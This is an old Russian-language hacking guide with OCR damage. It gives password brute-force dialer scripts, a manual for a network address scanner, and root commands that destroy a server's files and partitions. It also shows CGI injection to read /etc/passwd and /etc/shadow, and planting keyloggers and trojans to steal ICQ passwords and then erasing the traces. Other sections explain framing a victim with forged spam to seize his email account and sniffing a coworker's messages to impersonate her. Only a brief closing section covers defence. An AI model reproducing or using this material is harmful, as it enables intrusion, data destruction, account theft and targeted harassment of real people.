;  Неограниченное количество попыток позволяет войти в систему

;

;   30xCrLf

;   PASSCODE:*****

;

#DEFINE

INIT_MODEM=AT &F L2

INIT_DATA=8N1

LOGFILE=xxxxxx.LOG

PH0NE_NR=0130xxxxxx

DIAL_TRIES=5

LOGIN_TRIES=O

DIC(1)=C:\2\thc-lhO9\w1.w

#NOCARRIER

BEEP

BEEP

BEEP

LOG(NO CARRIER)

LOG(ON $DATE $TIME)

LOG(AT $DIC(1))

LOG()

G0T0(#START)

#START

LOG(--------- ----  )-------------------- --------------——)

LOG(TARGET : $PHONE_NR ON $DATE - $TIME)

LOG()

:1

LOG(Dialing ...)

HANGUP

DIAL

LOG(SSTRING)

WAIT4STRING(30,.^M,3,G0T0(1), PASS)

:2

set string=

SEND_NEXT_DIC(1)

wait(1)

LOG($DIC(1))

; да, регистрироваться с каждой попытки!

WAIT4STRING(15,.^M,3,G0T0(3),PASS)

G0T0(2)

:3

LOG_SESSION_ON

SEND()

SEND(?)

SEND(HELP)

SENDO

LOG()

LOG(!!!!! WE GOT THROUGH !!!!!!!)

LOG(Password : $DIC(1))

LOG()

BEEP

BEEP

BEEP

BEEP

BEEP

HANGUP

G0T0(#END)

#END

 

Четвертый пример скрипта

Это скрипт предназначен исключительно для платформ Telnet.

#DEFINE

init_modem=z

init_data=8n1

LOGFILE=xxxxxx.log

PHONE_NR=xxxxxx

DIAL_TRIES=O

L0GIN_TRIES=0

DIC(1)=D:\hackusr\dlctbig.txt

;dic(2)=d:\hackusr\bigdict2.txt

;dic(3)=d:\hackusr\bigdict3.txt

#NOCARRIER

LOG(NO CARRIER)

LOG(ON $DATE $TIME)

L0G(AT $DIC(1))

LOG(returning ...)

G0T0(#START)

#START

HANGUP

LOG_SESSION_ON

LOG()

log()

log( HaCK ATTeMPT STaRTeD                  )

log()

log( TaRGeT:  $PHONE_NR )

log( DaTe:      $DATE )

log( TiMe:       $TIME)

log()

log()

log( …….DiaLiNG)

dial  

log()

log( …….CoNNeCTeD!)

log()

log()

wait(5)           

wait4string(1,^M,5,goto(#start),sername>)

send(fh65)

:2

wait4string(1,^M,5,goto(#start),ocal>)

send(connect 189.25.56.7)

:3

if string~sconnected then goto(2)

if string~ncorrect then goto(3)

wait4string(1,^C,5,goto(4),ogin:)

send(root)

if string~sconnected then goto(2)

if string'ncorrect then goto(3)

:4

if string'sconnected then goto(2)

if string"ncorrect then goto(3)

wait4string(1,^D,5,goto(4),assword:)

send_next_dic(1)

if string'sconnected then goto(2)

if string"ncorrect then goto(3)

:5

if string~sconnected then goto(2)

if string~ncorrect then goto(3)

:6

wait(1)

if string'sconnected then goto(2)

if string~ncorrect then goto(3)

wait(1)

if string"sconnected then goto(2)

if string'ncorrect then goto(3)

wait(1)

if string"sconnected then goto(2)

if string'ncorrect then goto(3)

wait(1)

if string~sconnected then goto(2)

if string'ncorrect then goto(3)

wait(1)

if string'sconnected then goto(2)

if string~ncorrect then goto(3)

wait(1)

if ,string~sconnected then goto(2)

if string"ncorrect then goto(3)

wait(1) '

if string'sconnected then goto(2)

if string~ncorrect then goto(3)

wait(1)

if string~sconnected then goto(2)

if string~ncorrect then goto(3)

wait(1)

if string~sconnected then goto(2)

if string"ncorrect then goto(3)

:7

beep

beep

beep

beep

beep

beep

beep

beep

beep

log()

log()

log()

Log( HaCK ATTeMPT WaS SuCCeSSFuLL!!!!!!!!!!!!!)

log()

log( TaRGeT: $PHONE_NR DaTe: $DATE TiMe: $TIME)

log()

log()

log()

log( ACCouNT: root)

log( PaSSWoRD: DIC(D)

log()

log()

log()

#END

 

Сканирование адресов пользователей

Операции по сканированию сетевых адресов мы разберем на основе весьма известной программы Network User Address Attacker. Это программа известного сообщества Р/Н/А. NUA Attacker написан на Turbo С 2.0 хакером Доктором Диссектором. Network User Address Attacker сканирует клавишную панель SprintNet. При этом программа способна распознать ошибки кодов на SprintNet и других типах соединений. Каждый отсканированный сетевой адрес может зарегистрироваться под logfile с описанием возвращенного кода ошибки или краткой суммой данных главной системы. Каким образом программа дозванивается до Net и сканирует сетевые адреса пользователей? Диапазон сканирования задается атакующим. Кроме этого, в прилагаемом к программе файле SND390.TXT имеется список некоторых модемных телефонных номеров. Вы можете, конечно, использовать только известный вам номер, то есть тот номер, который наиболее близко соответствует вашему региону.

Эта программа может быть наиболее полезной при поиске сетей с коммутирующими пакетами или на основе UNIX. Автор этой программы нaдeeтcя, что любые ошибки найденные в ней будут переданы через сообщество Р/Н/А хакерам Доктору Диссектору, Темному Шлему, Корейцу Подавителю или Анонимному Анархисту.

 

Файлы программы

NUAA.EXE

Программа NUA Attacker.

NUAA.DOC

Документация.

README.PHA

Прочтите это сначала!

SND390.TXT

Список телефонных номеров Net.

NUAA.CFG

Отчет о текущей атаке и конфигурации модема.

NUAFILE.PHA

Список сетевых адресов пользователей.

LOGFILE.PHA

Список сетевых адресов пользователей, составленных атакующим В этом файле также содержатся коды ответа NUA, полученные атакующим.

Файлы NUAfile и Logfile могут модифицироваться. Файлы NUAFILE.PHA и LOGFILE.PHA — это обыкновенные текстовые файлы, вы можете редактировать их в любом текстовом редакторе. Кроме того, если файл уже существует, то любые данные добавятся к тому имени файла, которые существуют в файле с меткой EOF.

 

Запуск программы

Для запуска NUA Attacker введите с вашей консоли следующее:

С:\ >NUAA [/I]

Параметр /I позволяет вам начать выполнение программы без инициализации модема перед сканированием адресов. В этом случае, когда вы выберите команду Begin attack (Начать нападение), NUA Attacker сразу начнет сканирование адресов (если вы предварительно зарегистрировались в системе, то теперь вы снова должны зарегистрироваться на Net через приглашение @).

 

Настройка режима сканирования

Настройка сканирования адресов осуществляется через команду Setup attack. В появившемся диалоговом окне выполните настройку следующих опций.

Phone Number

Телефонный номер Net (SND390.TXT).

Starting NUA

Начальный сетевой адрес пользователя.

Ending NUA

Конечный сетевой адрес пользователя.

Timeout

Время ожидания ответа от сетевого адреса пользователя.

Log filename

Имя файла, в который будут выводится сообщения об ошибках и информация о неудачных попытках соединения.

NUA filename

Имя файла, в который будут выводится сетевые адреса пользователей (по умолчанию это файл NUAFILE. PHA).

Decimals

Включить или отключить режим десятичного сканирования. Пользователи Net используют сетевые адреса в формате: XXXXXX.XX.NUA Attacker поддерживает сканирование десятичных чисел.

Например, если вы настроите эту опцию так:

Starting NUA:   619100.10

Ending NUA:   619200.10

то программа начнет сканирование с 619100.10, следующий адрес сканирования соответствует 619100.11, затем пойдет 619100.12 и так далее.

При настройке сканирования вы можете воспользоваться следующими горячими клавишами:

·                     ESG

Выйти из диалогового окна Setup attack без сохранения модифицированных параметров.

·                     ALT-S

Сохранить модифицированные параметры в память компьютера.

После того, как вы выполните настройку сканирования, вы можете также сохранить ее на диск выбрав из меню File commands команду Save options. При этом сохранятся и все модифицированные параметры настроек модема.

Несколько слов по поводу формата сетевого адреса. Допустим, что вы произвели настройку так:

Starting NUA:   6191   *WRONG*  Ending NUA:   619100  *RIGHT*

Это означает, что сканирование проходит в диапазоне с 6191 по 6199 с пропуском 6200. Поэтому вы должны настроить параметры сканирования так:

Starting NUA:   619001   *RIGHT*

Ending NUA:   619100 *RIGHT*

то есть оба числовых поля должны иметь одинаковую длину.

 

Настройка модема

Настройка модема осуществляется через диалоговое окно Modem parameters.

·         COM Port

Порт, который использует ваш модем.

·         Baud Rate

Скорость передачи данных в бодах (например, 9600).

·         Initialization

Инициализация терминальной строки перед началом сканирования. Эта опция также поддерживает Hayes-совместимые модемы.

·         Dial Prefix

Префикс перед телефонным номером.

·         Dial Suffix

Символ, который будет стоять после телефонного номера. Этот символ прошивает ваш модем соответствующим параметром.

·         Hangup

Прервать последовательность передаваемых данных.

 

Процесс сканирования

Выберите опцию Begin attack. После этого произойдет следующее:

1.      Инициализация модема.

2.      Набор номера Net. Этот номер соответствует настройкам, произведенных в диалоговом окне Setup attack.

3.      Ожидание приглашения TERMINAL= и загрузка параметра D1. Параметр D1 означает, что ваш компьютер вошел в сеть.

4.      Ожидание приглашения @.

5.      Сканирование. Сканирование соответствует параметру Starting NUA диалогового окна Setup attack.

После того, как сканирование сетевых адресов закончится, NUA Attacker выйдет из сети.

В процессе сканирования вы можете воспользоваться следующими горячими клавишами:

ALT-B

Передать в Net сигнал, соответствующий прерыванию соединения.

ALT-H

Повесить трубку. В этом случае программа начнет работать в режиме Pause.

ALT-X

Повесить трубку и выйти и прекратить атаку.

ESC

Временно остановить процесс сканирования.

В процессе нападения на экране вашего монитора будут появляться следующие сообщения:

Starting NUA

Сетевой адрес, который программа начинает сканировать.

Ending NUA

Отсканированный сетевой адрес.

Connections

Количество соединений, найденное в текущем сканировании.

Current NUA

Сетевой адрес, который программа отсканировала в данный момент времени.

Log

Logfile.

NUA

NUAfile.

Time/Elapsed

Текущее время и время сканирования.

Status

Код соединения и/или соответствующая информация о состоянии модема.

Last

Код последнего соединения и/или соответствующая информация о состоянии модема.

В диалоговом окне Setup attack обратите внимание на переключатель в Bad Pad. Если выбрана опция Y, это означает, что программа посылает в сеть строку 10 <SPACE><CR> и каждый раз ждет две секунды до тех пор, пока не появится приглашение @ или TERMINAL=. (то есть до непосредственной регистрации на Net). Некоторые клавиатуры медленно реагируют на регистрацию в сети. Особенно это относится к высоким скоростям. Поэтому, если вы не можете зарегистрироваться, активизируйте параметр Y.

Убить «демонов»!

Демон — это процесс в UNIX системе, который предоставляет вам некоторые услуги. Например, в Internet:

·                     Ftpd (ftp daemon) port 21

·                     Telnetd (telnet daemon) port 23

·                     Smtpd (smtp daemon) port 25

·                     Httpd (http daemon) port 80

·                     Pop3d (рорЗ daemon) port 110

Предположим — вы взломали систему и просто хотите «западлить» ей. Тогда (от root'a) пишем:

#killall httpd

И вот результат — web-страница системы не доступна.

#killall ftpd

Результат — ftp-сервис недоступен.

Правда, администратор проще простого запустит все обратно:

Администратор (от root'a):

#httpd start (если Linux)

#apachectl  restart  (если FreeBSD и некоторые другие ОС с web сервером apache)

А теперь ftpd:

#ftpd (все очень просто!)

Как сделать чтобы система вообще навернулась. Довольно просто. Вот пример простейшей атаки, цель которой — уничтожить информацию на винчестере атакуемого сервера (от root'a):

#cd /

#rm * (удаляет все (!) файлы в корневом каталоге)

#cd /boot

#rm *

#cd /bin

#rm *

#cd /sbih

#rm *

#cd /usr/bin

#rm *

#cd /usr/sbin

#rm *

Эти строки, после выполнения удалят все жизненно необходимые файлы для системы... (кроме /etc, но об этом позже).

Будьте аккуратны, т.к. команда rm находится в одном из каталогов:

·         /bin

·         /sbin

·         /usr/bin

·         /usr/sbin

Если ее удалить, то дальнейшее удаление будет невозможно (с помощью команды rm конечно). Чтобы этого избежать — просто узнайте где эта команда находится:

#which rm

Эта строка выдаст вам директорию, в которой находится команда rm. Удаляйте ее последней.

Хотите красиво заподлить?

Без проблем:

#cd /etc

#rro  *

Это удалит все настройки системы!

А теперь пишем:

#reboot

Что в итоге (после сотни сообщений об ошибках) перегрузит сервер или просто подвиснет его...

Вот и все, система на 100% неработоспособна...

Вы очень злой на этот сервер? Тогда пишем (от root'a):

#fdisk

Затем вводим р (это выведет нам все разделы винчестера. А теперь(например, если разделов 4), пишем:  

d (enter),    4 (enter)

d (enter),     3 (enter)

d (enter),    2 (enter)    

d (enter),    1 (enter)

Теперь жмем w и Enter.

Все! Система вообще навернулась! (Компьютер даже загрузится не сможет!)

Есть в UNIX команда dd, наверное самая опасная из всех существующих (разумеется при неумелом использовании). Вот, что я однажды натворил. Работал я тогда под SlackWare:

Два винта:

hda1 - slack ;   hda2 - dos ;  hdc2 - slack

И вот я пишу (моя проблема была в том, что DOS, как обычно, переписал MBR (Master Boot Record) и я не мог грузить hdc2 (SlackWare). Вы наверно спросите — а разве нельзя грузить UNIX с дискеты? Конечно можно! Но у меня не работал флоп...):

dd /dev/hda /dev/hdc 0 512

А теперь по-русски:

Копируем первые 512 байт с одного винта на другой. Что в этих 512 байтах? Master Boot Record (MBR). Значит я нечаянно нажал не «ту» кнопку и... ничего не произошло...

Я ввожу строку еще раз и забываю указать 512 (в конце строки)...

И что???

А вот что — команда dd начала копировать раздел (весь) hda в hdc!

И летит полностью раздел hdc!

Я за долю секунды понял, что сделал что-то не то... и нажал Ctrl+C, что прервало выполнение программы dd. Но все мои усилия оказались напрасны... команда dd уже скопировала около 20 Кб с одного винта на другой...

Винт пришлось переразбивать и переформатировать...

В результате я потерял около 8 часов времени при переинсталляции всего что было, неделю на скачивание всех нужных мне программ с Internet и около 2-х месяцев моих работ...

Отсюда вывод: никогда не экспериментируйте с такого рода программами как dd и fdisk.

А теперь, как говорится ближе к телу (я имел ввиду делу).

 

Способы проникновения в удаленную систему

99% провайдеров вы так просто не взломаете (сразу), поэтому забудьте (на время) про их взлом! Ведь там же не полные ламера сидят (хотя и такое бывает...

А теперь непосредственно шаги (или действия) для взлома.

Вы должны просканировать атакуемый хост (сервер) (пример с использованием программы portscanner):

#portscanner 55.55.55.55 1  1024

где 55.55.55.55 — IP-адрес хоста;  1-c какого порта начинать; 1024 — каким закончить.

Далее (по истечении n-го времени) мы получаем ответ (по большей части стандартный):

21

22

25

80

110

Теперь запускаем следующие команды:

#telnet HOST_IP 21

#telnet HOST_IP 22

#telnet HOST_IP 23

#telnet HOST_IP 80

#telnet HOST_IP 110

Обязательно после выполнения каждой команды и перед вводом следующей — записываем версию, название и релиз демона на порте.

Теперь — остается самое простое — найти exploit к этому демону...

Не работает?

Вот возможные ошибки:

1.      Вы ошиблись в версии;

2.      Вы ошиблись с IP-адресом;

3.      Хост, который вы атакуете, уже пропатчен;

4.      Вы неправильно используете exploit.

Более простые методы взлома

Вот простой метод взлома (очень популярный среди новичков) — это взлом через CGI. Что такое CGI? Это Common Gateway Interface.

CGI программы выполняются на сервере, а данные выводят вам в виде html или других видов mime-types (например gif).

Вы вероятно задавали себе вопрос — как работают баннерные системы, счетчики страниц, чаты, доски объявлений, различные формы и т.д. Безусловно, все они используют CGI...

Вот простой пример использования CGI, написанного на Perl:

#l/usr/bin/perl

print "Content-type:  text/html\n\n";

print "Hello!\n";

Эта простейшая из всех простейших программ выведет (при ее запуске на сервере) в вашем браузере строчку:

Hello!

и перевод каретки.

А вот, простой пример текстового счетчика (можете поставить его к себе на страничку). Условия, чтобы он работал:

1.      Файлы

·         Count.cgi — имя файла с программой;

·         Count.dat — имя файла с данными о посещениях.

2.      Права доступа: (предполагается, что вы находитесь в директории

с этими файлами):

·         Count.cgi 755. Т.е.

        #chmod count.cgi 755

·         Count.cgi 777. Т.е.

               #chmod count.dat 777

Если у вас нет telnet доступа к серверу, а только ftp доступ, то найдите программу ftp, которая поддерживает функцию chmod или используйте текстовую версию программы ftp.

Теперь содержимое программы count.cgi:

#!/usr/bin/perl

print "Content-type:  text/html\n\n";

open (file,"count.dat);

@dat=<file>;

close (file);

 

$dat[0]++;

open (file,">count.dat");

print "$dat[0]\n";

close (file);

print "Всего посетителей $dat[0]\n";

 

Файл count.dat должен содержать всего одну строчку с количеством посещений (например 5).

Вот и все! Теперь каждый раз, после обращения к count.cgi количество посещений будет расти на 1.

Теперь вы знаете некоторые основы CGI и готовы ко взлому через него...

Не пытайтесь взламывать поисковики и подобные им системы (с хорошей посещаемостью) т.к. все они очень хорошо пишут CGI скрипты! Попробуйте найти какой-нибудь ламерский сайт (желательно зарубежный, т.к. их больше и по количеству, и по ламерам в виде администраторов), так как есть одно правило: «Сложность взлома Прямо пропорциональна посещаемости сайта».

А теперь ко взлому... (Этот метод работает не на всех системах, но в некоторых все же пашет...)

Скрипт рассылки (записывает ваш e-mail и высылает вам что-то). Вместо e-mail пишем просто:

cat /etc/passwd

или

cat /etc/master. passwd

или

cat /etc/shadow

Попробуйте все три строки (по очереди). Если пишется ошибка, то возможно, так их не суждено взломать.

А если пишется что-то типа:

Root :fdkjhgSFDgf: .........

То вы набрели на файл паролей... Теперь вам необходимо его расшифровать (например john the пррег'ом) и вы явным образом можете проникнуть в систему. Вывод: скрипты иногда позволяют запускать на удаленной машине программы.

Технология обрыва стэка

Обрыв стека — это когда вы вешаете какой-нибудь демон, посылая недопустимый набор символов на его порт.

Что при этом происходит? При аварийном выходе демона, он (демон) сбрасывает память (ОЗУ) на винчестер. При этом из этого сброса, помимо всякого мусора, можно вытянуть много полезной информации, например, — те же пороли для входа в систему.

Сброс на винт делается специально для разработчиков данного демона, чтобы они (разработчики) могли просмотреть, как он (демон) навернулся.

Где этот Файл? Файл всегда находится в каталоге с демоном и называется (обычно) «.core».

Как «оборвать» демон? Есть множество различных путей, например, послать недопустимый набор символов на порт этого демона, что может привести к тому, что он «грохнется».

Многие наверно помнят пол-кбайта, которые вешали любой real-networks сервер (сервера для проигрывания real-audio/real-video форматов). Кстати, это было не так давно...

Охота за UIN'OMBugs, Crack и Social Ingineering

Итак я вышел на тропу войны: хочу быть смелым и красивым, с шестизначным UIN номером и чтоб все поняли что миллионные числа это не серьезно, вот посмотрите на меня — я был одним из первых пользователей или неважно кем я был, важнее кем я стал. А как я стал, сейчас расскажу.

На мой взгляд самый реальный и предельно простой способ: исследование Internet Сервис Провайдера и соседских сетей на предмет тех пользователей, кто имеет открытые зашаренные диски и не защитили их пассвордом. Находятся такие люди программой «Легион». Из пяти сотен проверенных компьютеров более тридцати имело открытым диск С:\ с полным доступом. Все они являлись пользователями ICQ. Выбор UINOB просто потрясающий — от 20хххх до 80ххххх. Смотрим C:\Program Files\ICQ\UIN и видим number.uin — внутри этого файла всего лишь несколько строк с информацией о номере, имени, нике и e-mail адресе хозяина. Если номер устраивает, ставится keyboard sniffer который запишет в лог все то, что пользователь введет в клавиатуры.

ICQ имеет три уровня секьюритиLow, Medium и High. Чем выше уровень секьюрити у пользователя тем быстрее получается полный доступ к его пассворду. Иными словами, чем выше уровень защиты — тем больше вероятность, что жертва введет пассворд для того чтоб использовать ICQ. Ставится троян для облегчения дальнейшего доступа и перезагружается машина (перезагрузка машины зависит от многочисленных факторов, от операционной системы до скорости подсоединения к сети). При благоприятном стечении обстоятельств получение пассворда к выбранному UINy займет десять, от силы двадцать, минут — ровно столько, сколько потребуется на reboot, дозвонку на провайдера, запуск ICQ и введение пассворда, далее берется лог созданный keyboard sniffer и читается пассворд. Все.

Более того, возможность того что после всего этого останутся какие-либо логи или иные следы взлома ничтожно мала: уничтожается лог, sniffer и троян.

Вы что, уже уходите? А что, у вас еще что-то осталось?

Начнем с того, что если вы зарегистрировали аккаунт и забыли к нему пассворд, достаточно заявить свой UIN на http://www.icq.com/password/ и в течении нескольких дней служба технической поддержки ICQ вышлет на указанный вами при регистрации e-mail адрес забытый пассворд.

Теперь рассмотрим это с позиции хакера — для того чтобы получить пассворд к определенному UINy надо лишь заявить о потери памяти и пойти проверить e-mail.

Как прочитать сообщение адресованное не вам — это другая история. Например, существует РОРЗ Password Crack — имя логина и домейн нам уже известны. Главное — это предельно правильно идентифицировать систему и тип сервера, аккаунт на котором необходимо проверить и искать инструменты взлома этой конкретной конфигурации. Например, недавно разразился громкий скандал по поводу hotmail.com в связи с очередной недоработкой славной фирмы Микрософт, дающей возможность миллионам людей право читать e-mail друг друга, чего они совершенно делать не должны.

Рассмотрим конкретный вариант: некто Вася Табуреткин зарегистрировал себе ICQ аккаунт под номером 777777. Какой замечательный UIN! Смотрим какой у Васи e-mail, видим vasya@something.com. По номеру UINa можно сделать вывод, что он был зарегистрирован более 2 лет назад. Если sometihg.com является публичным бесплатным e-mail сервисом, вполне может обнаружиться что Вася этот аккаунт не пользовал и более такого адреса не существует. Как результат происходит регистрация точно такого же аккаунта, заявляется о потери пассворда и проверятся новый e-mail на предмет пассворда от 777777.

Существует другой, более сложный вариант игры: лишение Васи обладания его e-mail адресом. Есть конкретные правила поведения пользователей сервиса (например: email — нельзя спамить, web — нельзя порнографии), нарушая которые пользователи как правило лишаются права на адрес или web-страницу. Кто мешает хакеру написать несколько десятков тысяч воззваний о легализации детской порнографии и проституции от имени vasya@something.com? Установите тип сервера, узнайте язык общения с ним клиента и пошлите все эти воззвания самому себе и своим друзьям (или на свои другие e-mail аккаунты) указав обратным адресом vasya@sdmething.com.

Далее вы и ваши друзья должны будете переправить все «полученное», от Васи по адресу администратора домена с нотой протеста против легализации и просьбой наказать виновного. «Послания» Васи следует уничтожить и в завязавшейся переписке с администрацией сообщить, что следов преступления осталось мало: вы все стерли так как были шокированы и праведный гнев обуял вас так сильно, Что всем подъездом вас держали. Попросите администратора обязательно держать вас в курсе дела. Далее пошлите сообщение того же самого содержания, используя Васин обратный адрес, вашим другим друзьям или на ваши другие аккаунты и напишите администрации о этом безобразии в других словах. Создайте видимость, что этот Вася шлет тысячами сообщения о нелегальных вещах группе незнакомых между собой людей... Прогнозирую до 80% успеха, у Васи отнимут аккаунт, о чем вам заявят как о большом достижении в борьбе с спамерами и рассадниками порнографии. Вы в тот же день зарегистрируете аккаунт на себя и заявите о потере пассворда. В итоге у вас долгожданный UIN и твердая уверенность в том, что если вы имеете бесплатный e-mail — никто никогда у вас его не отнимет.

Попытка — не пытка, как говорил товарищ Берия

Поиграем с тем, что ICQ имеет лимит на длину пассворда 8 знаков. В Windows среде поменять пассворд на свой UIN нельзя или достаточно сложно — для этого существует функция в клиенте. В Linux, например, в большинстве случаев имеется файл, в котором существует графа password, куда пользователь вписывает свой пассворд (при возможности хака юниксовой машины пассворд читается без малейших затруднений, но как получить доступ к домашней директории пользователя или доступ root — это уже совершенно другой разговор).

Теперь давайте попробуем прописать в Linux ICQ клиент-конфигурационный файл, тот самый желаемый вам UIN и пассворд из любого набора букв длинной в 9, а может и больше знаков. Попробовали?

При благоприятном стечении обстоятельств вы сможете получать и отправлять сообщения от лица выбранного вами UINa. Если ваш Linux ICQ клиент поддерживает любую длину пассворда и возможность его смены на сервере — вы берете тот аккаунт, который вам нравится.

Данный баг работал достаточно долго и надеюсь создатели ICQ защитили своих клиентов, но кто знает...

«Она же... Валентина Понеяд... Она же...»

Вопрос: Может ли кто-либо изменить пассворд моего ICQ аккаунта без получений доступа на мой компьютер и e-mail?

Ответ: Да, отвечу я и посоветую искать инструмент взлома ICQ под названием «ICQhijeck». При наличии IP жертвы, его UINa и номера порта для связи с клиентом ICQhijeck пошлет spoofed пакет, заявляющий о себе, что пакет принадлежит самому клиенту и несет в себе задачу смены пассворда. Пассворд выбирает нападающий.

Кстати, использование сниффера вообще всегда является хорошей идеей сбора информации.

Вопрос: меня зовут Петя Иванов, у меня в офисе на одной со мной сетке сидит Маша Пилюлькина и она страшная стерва. Что я могу сделать

Ответ: испортить ей жизнь. Если вы находитесь на одном и том же фрагменте сети, у вас все карты в руках, «ICQsniff» отдаст вам Машин пассворд, да и впрочем пассворды всех других пользователей ICQ в вашей конторе. Более того, существуют методы перехвата сообщений от одного пользователя другому и коррекция их, например, вы можете следить за перепиской Маши и вашего босса. Как только вам в этой переписке что-то не понравится, можете сообщить боссу от лица Маши все, что вы думаете о предмете обсуждения и заявить, что он как начальник некомпетентен в этом вопросе, а вот, например, Петя Иванов гораздо умнее и так далее, так что давайте Пете Мерседес купим.

Вопрос: а где мне взять ICQhijeck, ICQsniff, keyboard sniffer, трояна и ТСР/UDP sniffer и есть ли что-либо еще такое интересное, где можно нажать кнопочку и все-все хакнуть?

Ответ: Существует такое понятие как «Private Bug», нечто обнаруженное лишь вами и никому еще не известное. Вполне возможно, что люди, посвятившие много время изучению методам работы ICQ, имеют очень мощные инструменты по работе с ним.

Но достанутся ли эти tools вам? Все зависит от вас, от ващего терпения, трудолюбия и любознательности. Не забудьте прибавить коммуникабельность и умение задать интересный вопрос знающему предмет обсуждения человеку. Вполне возможно вы все узнаете.

Если у вас нет друзей, способных рассказать вам то, что вы хотите знать, советую использовать большие поисковые системы типа www.yahoo.com. Не забудьте указать предмет поиска.

Выйду на улицу, гляну на село...

Время рассмотреть методы защиты и что вы должны помнить, если дорожите своим UINOM И информацией, передаваемой при помощи ICQ.

Помните, что существует вероятность, что кто-то может читать ваши сообщения и то, что ICQ не является стандартом секретных коммуникаций.

Имеются десятки программ, способных вызвать сбой в работе вашего ICQ клиента, особенно если он работает в среде Windows. Следите за новостями, публикуемыми на www.icq.com и используйте всегда последнюю версию ICQ, даже если старая имеет свои достоинства в виде безлимитного размера посылаемого сообщения. Вполне возможно, что вы заплатите слишком дорогую цену за эту возможность.

Имейте антивирусные программы и используйте их. Так же за ними необходимо следить — брать новые библиотеки для обнаружения вирусов и троянов с web-сайта производителя программы.

Не доверяйте безгранично публичным сервисам типа free emeii, free webhosting и так далее. Ничего удивительного в том, что кто-то уничтожил все ваши файлы на страничке или прочел ваш e-mail, я не вижу. Вполне житейское дело, и, пожалуйста, не имейте публичного e-mail адресом для контакта технического обслуживания ICQ с вами в случае потери пассворда. Будьте готовы к тому, что в один прекрасный день вы обнаружите, что ваш пассворд изменен и аккаунт вам не принадлежит. Обратитесь за помощью в технический суппорт.

Ну и конечно следите за своим компьютером при использовании Internet — есть большой выбор программ, показывающих вам кто, зачем, почему и когда пытался проникнуть на ваш компьютер.

Иногда я сам лично думаю, что вполне возможно что создатели ICQ в данный момент насчитывают несколько миллионов компьютеров в своей базе данных, к которым они имеют полный доступ. Кто знает, может быть ICQ — это хорошо распространенный троян? Сложное чувство, признаюсь вам...